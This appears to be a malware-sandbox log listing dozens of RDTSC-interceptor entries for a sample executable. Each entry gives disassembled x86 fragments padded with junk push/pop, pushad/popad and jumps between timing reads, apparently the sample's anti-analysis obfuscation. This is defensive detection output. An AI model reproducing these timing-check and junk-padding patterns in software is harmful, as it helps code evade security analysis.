Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E105F2 second address: 6E1062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f popad 0x00000010 mov dword ptr [esi+10h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7B216C3180h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1062B second address: 6E1066F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c jmp 00007F7B212E85D6h 0x00000011 mov dword ptr [esi+14h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F7B212E85D7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1066F second address: 6E10675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10675 second address: 6E1068F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+54h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1068F second address: 6E10695 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10695 second address: 6E1069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1069B second address: 6E1069F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1069F second address: 6E106C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B212E85D7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E106C3 second address: 6E106C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E106C9 second address: 6E106CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E106CD second address: 6E106E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+58h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, 251A40F1h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E106E9 second address: 6E1073B instructions: 0x00000000 rdtsc 0x00000002 mov cx, FB2Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 movsx ebx, si 0x0000000c popad 0x0000000d popad 0x0000000e mov dword ptr [esi+1Ch], eax 0x00000011 jmp 00007F7B212E85CEh 0x00000016 mov eax, dword ptr [ebx+5Ch] 0x00000019 pushad 0x0000001a call 00007F7B212E85CEh 0x0000001f push esi 0x00000020 pop edx 0x00000021 pop esi 0x00000022 mov dx, 0D72h 0x00000026 popad 0x00000027 mov dword ptr [esi+20h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7B212E85D4h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1073B second address: 6E1079A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 jmp 00007F7B216C317Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+60h] 0x00000010 pushad 0x00000011 movzx esi, di 0x00000014 mov eax, edi 0x00000016 popad 0x00000017 mov dword ptr [esi+24h], eax 0x0000001a pushad 0x0000001b mov dl, al 0x0000001d popad 0x0000001e mov eax, dword ptr [ebx+64h] 0x00000021 jmp 00007F7B216C317Fh 0x00000026 mov dword ptr [esi+28h], eax 0x00000029 jmp 00007F7B216C3186h 0x0000002e mov eax, dword ptr [ebx+68h] 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 mov al, bh 0x00000036 mov esi, 68BAEB45h 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1079A second address: 6E10824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 5Ah 0x00000005 mov cx, BCF9h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+2Ch], eax 0x0000000f pushad 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F7B212E85D0h 0x00000017 sbb si, 9E08h 0x0000001c jmp 00007F7B212E85CBh 0x00000021 popfd 0x00000022 popad 0x00000023 pushfd 0x00000024 jmp 00007F7B212E85D4h 0x00000029 jmp 00007F7B212E85D5h 0x0000002e popfd 0x0000002f popad 0x00000030 mov ax, word ptr [ebx+6Ch] 0x00000034 jmp 00007F7B212E85CEh 0x00000039 mov word ptr [esi+30h], ax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 call 00007F7B212E85CDh 0x00000045 pop esi 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10824 second address: 6E10841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bl, al 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10841 second address: 6E10847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10847 second address: 6E1084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1084B second address: 6E1084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1084F second address: 6E108B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c jmp 00007F7B216C3188h 0x00000011 mov eax, dword ptr [ebx+0000008Ch] 0x00000017 jmp 00007F7B216C3180h 0x0000001c mov dword ptr [esi+34h], eax 0x0000001f jmp 00007F7B216C3180h 0x00000024 mov eax, dword ptr [ebx+18h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7B216C3187h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E108B8 second address: 6E1090E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F7B212E85CFh 0x00000008 pop esi 0x00000009 mov si, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esi+38h], eax 0x00000012 jmp 00007F7B212E85CBh 0x00000017 mov eax, dword ptr [ebx+1Ch] 0x0000001a jmp 00007F7B212E85D6h 0x0000001f mov dword ptr [esi+3Ch], eax 0x00000022 pushad 0x00000023 movzx ecx, bx 0x00000026 mov cx, dx 0x00000029 popad 0x0000002a mov eax, dword ptr [ebx+20h] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push esi 0x00000031 pop ebx 0x00000032 mov dh, al 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1090E second address: 6E1091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C317Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1091D second address: 6E10921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10921 second address: 6E1093E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B216C3180h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E1093E second address: 6E10944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10944 second address: 6E10948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10948 second address: 6E10979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e pushad 0x0000000f push ebx 0x00000010 mov ecx, 7CC339D1h 0x00000015 pop esi 0x00000016 pushad 0x00000017 mov ecx, edx 0x00000019 mov dx, C43Ch 0x0000001d popad 0x0000001e popad 0x0000001f push 00000001h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7B212E85CEh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10979 second address: 6E109A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F7B216C3187h 0x00000015 movzx ecx, di 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E109A4 second address: 6E109AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E109AA second address: 6E109AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E109AE second address: 6E109F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7B212E85D5h 0x00000014 sub eax, 5D54AB06h 0x0000001a jmp 00007F7B212E85D1h 0x0000001f popfd 0x00000020 mov ecx, 69D0BEB7h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E109F0 second address: 6E10A01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, B945h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lea eax, dword ptr [ebp-10h] 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10A66 second address: 6E10A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10A6C second address: 6E10A86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10A86 second address: 6E10A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10A8A second address: 6E10A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10A90 second address: 6E10AE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007F7B212E85D0h 0x00000010 js 00007F7B8F2D71CFh 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007F7B212E85CCh 0x0000001f sbb ax, C8B8h 0x00000024 jmp 00007F7B212E85CBh 0x00000029 popfd 0x0000002a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10AE1 second address: 6E10B14 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B216C3188h 0x00000008 sub eax, 453C0318h 0x0000000e jmp 00007F7B216C317Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C27 second address: 6E10C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C2B second address: 6E10C31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C31 second address: 6E10C37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C37 second address: 6E10C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C3B second address: 6E10C4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C4A second address: 6E10C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C4E second address: 6E10C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C52 second address: 6E10C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C58 second address: 6E10C5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10C5E second address: 6E10C62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10CD8 second address: 6E10CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B212E85CEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10CEA second address: 6E10D75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ebx, esi 0x00000011 jmp 00007F7B216C317Eh 0x00000016 popad 0x00000017 mov eax, 284CBE41h 0x0000001c popad 0x0000001d js 00007F7B8F6B1B19h 0x00000023 jmp 00007F7B216C317Ch 0x00000028 mov eax, dword ptr [ebp-04h] 0x0000002b pushad 0x0000002c mov al, 3Fh 0x0000002e mov ecx, edi 0x00000030 popad 0x00000031 mov dword ptr [esi+08h], eax 0x00000034 jmp 00007F7B216C3185h 0x00000039 lea eax, dword ptr [ebx+70h] 0x0000003c jmp 00007F7B216C317Eh 0x00000041 push 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F7B216C3187h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10D75 second address: 6E10DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov esi, 7144AC53h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10DA0 second address: 6E10DDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7B216C3187h 0x0000000a or eax, 2D41CFEEh 0x00000010 jmp 00007F7B216C3189h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10DDD second address: 6E10E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F7B212E85CEh 0x0000000f lea eax, dword ptr [ebp-18h] 0x00000012 pushad 0x00000013 push esi 0x00000014 push edi 0x00000015 pop ecx 0x00000016 pop edi 0x00000017 pushfd 0x00000018 jmp 00007F7B212E85D6h 0x0000001d xor esi, 23199CF8h 0x00000023 jmp 00007F7B212E85CBh 0x00000028 popfd 0x00000029 popad 0x0000002a nop 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10E37 second address: 6E10E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx esi, dx 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, 2A7Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10E5A second address: 6E10E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10E5F second address: 6E10E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C317Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10E70 second address: 6E10E8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10E8E second address: 6E10E94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10F4D second address: 6E10FA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F7B212E85D8h 0x0000000c add eax, 4D230728h 0x00000012 jmp 00007F7B212E85CBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e pushad 0x0000001f mov bx, si 0x00000022 mov ch, 98h 0x00000024 popad 0x00000025 mov ecx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F7B212E85D6h 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10FA5 second address: 6E10FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10FAB second address: 6E10FAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10FAF second address: 6E10FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b jmp 00007F7B216C3189h 0x00000010 mov edx, 74E806ECh 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dh, 9Bh 0x0000001a push esi 0x0000001b pop edx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E10FE0 second address: 6E11053 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007F7B212E85D7h 0x00000010 lock cmpxchg dword ptr [edx], ecx 0x00000014 jmp 00007F7B212E85D6h 0x00000019 pop edi 0x0000001a pushad 0x0000001b mov dx, cx 0x0000001e mov eax, 5553ACD9h 0x00000023 popad 0x00000024 test eax, eax 0x00000026 jmp 00007F7B212E85D4h 0x0000002b jne 00007F7B8F2D6C59h 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11053 second address: 6E110AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov edx, dword ptr [ebp+08h] 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F7B216C3180h 0x00000010 add cx, D7C8h 0x00000015 jmp 00007F7B216C317Bh 0x0000001a popfd 0x0000001b mov eax, 6071493Fh 0x00000020 popad 0x00000021 mov eax, dword ptr [esi] 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F7B216C317Eh 0x0000002c xor si, DA28h 0x00000031 jmp 00007F7B216C317Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E110AA second address: 6E110E5 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F7B212E85D5h 0x0000000d sub cl, 00000046h 0x00000010 jmp 00007F7B212E85D1h 0x00000015 popfd 0x00000016 popad 0x00000017 mov dword ptr [edx], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E110E5 second address: 6E110E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E110E9 second address: 6E110ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E110ED second address: 6E110F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E110F3 second address: 6E11111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 jmp 00007F7B212E85CCh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esi+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push esi 0x00000015 pop edi 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11111 second address: 6E11125 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C3180h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 6E11125 second address: 6E11192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b jmp 00007F7B212E85D7h 0x00000010 mov eax, dword ptr [esi+08h] 0x00000013 pushad 0x00000014 pushad 0x00000015 mov eax, 2233CA31h 0x0000001a push ecx 0x0000001b pop edi 0x0000001c popad 0x0000001d call 00007F7B212E85CAh 0x00000022 push esi 0x00000023 pop ebx 0x00000024 pop ecx 0x00000025 popad 0x00000026 mov dword ptr [edx+08h], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c jmp 00007F7B212E85D6h 0x00000031 call 00007F7B212E85D2h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
